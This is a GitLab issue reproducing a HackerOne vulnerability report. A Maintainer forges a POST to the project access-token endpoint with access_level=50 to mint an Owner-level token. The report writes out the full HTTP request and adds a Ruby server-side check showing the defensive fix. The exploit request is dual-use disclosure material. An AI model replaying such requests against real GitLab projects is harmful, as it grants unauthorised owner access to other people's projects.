
Maintainer user can become owner of project

HackerOne report #1805549 by shubham_sohi on 2022-12-14, assigned to @fvpotvin:


Report

Summary

I have found a way that can be used by a low-privileged user to become owner of a project.

NOTE: You need a premium GitLab account to verify the issue.

Steps to reproduce

1. Log in to the admin account.
2. Go to https://gitlab.com/projects/new, click "Create blank project" and create a project with name P.
3. In project P, go to Project Information > Members and invite user A with the Maintainer role.
   (Attachment: Screenshot_(426).png)
4. Log in to user A's account.
5. In project P, go to Settings > Access Tokens; here user A can create an access token.
6. User A can only create an access token for the roles Maintainer, Guest, Reporter and Developer, and does not have permission to create an access token for the Owner role.
7. Run the request below from user A's account, with your group_name and project_P_name.

```http
POST /<-group_name->/<-project_P_name->/-/settings/access_tokens HTTP/2
Host: gitlab.com
Content-Length: 444
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, /; q=0.01
X-Requested-With: XMLHttpRequest
Sec-Ch-Ua-Platform: "Windows"
Origin: https://gitlab.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://gitlab.com
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: { REDACTED }
X-Csrf-Token: { REDACTED }

resource_access_token%5Bname%5D=ksjdf&resource_access_token%5Bexpires_at%5D=2023-01-13&resource_access_token%5Baccess_level%5D=50&resource_access_token%5Bscopes%5D%5B%5D=api&resource_access_token%5Bscopes%5D%5B%5D=read_api&resource_access_token%5Bscopes%5D%5B%5D=read_repository&resource_access_token%5Bscopes%5D%5B%5D=write_repository&resource_access_token%5Bscopes%5D%5B%5D=read_registry&resource_access_token%5Bscopes%5D%5B%5D=write_registry
```

8. In the response you will get a new access token.
9. Now you can use this token to perform all actions in the project as admin.
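The report shows that the form only hides the Owner option in the UI while the server still accepts `access_level=50`. The defensive fix is a server-side check that a member can never mint a resource access token above their own role. The following is an added illustration in Ruby (GitLab is a Rails application) and is not GitLab's own code: the numeric role values are GitLab's documented ones, the parsing helper and `authorize_token_request` are hypothetical, and the sample body is constructed to mirror the request above.

```ruby
require 'cgi'

# GitLab's documented numeric access levels (not the project's source code).
ACCESS_LEVELS = {
  'Guest' => 10, 'Reporter' => 20, 'Developer' => 30, 'Maintainer' => 40, 'Owner' => 50
}.freeze

# Constructed sample body, identical in shape to the report's request:
# a Maintainer asking for an Owner-level (50) token.
SAMPLE_BODY = 'resource_access_token%5Bname%5D=ksjdf' \
              '&resource_access_token%5Bexpires_at%5D=2023-01-13' \
              '&resource_access_token%5Baccess_level%5D=50' \
              '&resource_access_token%5Bscopes%5D%5B%5D=api' \
              '&resource_access_token%5Bscopes%5D%5B%5D=read_api'.freeze

# Hypothetical policy: a member may create tokens only at or below their own level.
def allowed_access_levels(creator_level)
  ACCESS_LEVELS.values.select { |level| level <= creator_level }
end

# Decode an application/x-www-form-urlencoded body. CGI.parse unescapes both
# keys and values, so "resource_access_token%5Bname%5D" becomes the Rails-style
# nested key "resource_access_token[name]".
def parse_token_params(body)
  pairs = CGI.parse(body)
  raw_level = pairs['resource_access_token[access_level]'].first
  {
    name: pairs['resource_access_token[name]'].first,
    expires_at: pairs['resource_access_token[expires_at]'].first,
    access_level: raw_level && raw_level.to_i,
    scopes: pairs['resource_access_token[scopes][]']
  }
end

# Server-side authorization that does not trust the client's choice of role.
# Returns [:allowed, params] or [:rejected, reason].
def authorize_token_request(body, creator_level)
  params = parse_token_params(body)
  requested = params[:access_level]

  return [:rejected, 'access_level missing'] if requested.nil?
  return [:rejected, "unknown access_level #{requested}"] unless ACCESS_LEVELS.value?(requested)
  unless allowed_access_levels(creator_level).include?(requested)
    return [:rejected, "access_level #{requested} exceeds creator level #{creator_level}"]
  end

  [:allowed, params]
end

if __FILE__ == $PROGRAM_NAME
  maintainer = ACCESS_LEVELS['Maintainer']
  verdict, detail = authorize_token_request(SAMPLE_BODY, maintainer)
  puts "#{verdict}: #{detail}"   # rejected: access_level 50 exceeds creator level 40
end
```

The important property is that the check is evaluated against the creator's membership on the server, not against what the form offered; hiding the Owner option client-side is only a usability measure, as the report demonstrates.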

Impact

A Maintainer-role user gets owner privileges.

What is the expected correct behavior?

A Maintainer-role user should only be able to create access tokens for the Maintainer, Guest, Reporter and Developer roles.

Output of checks

This bug happens on GitLab.com.


Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: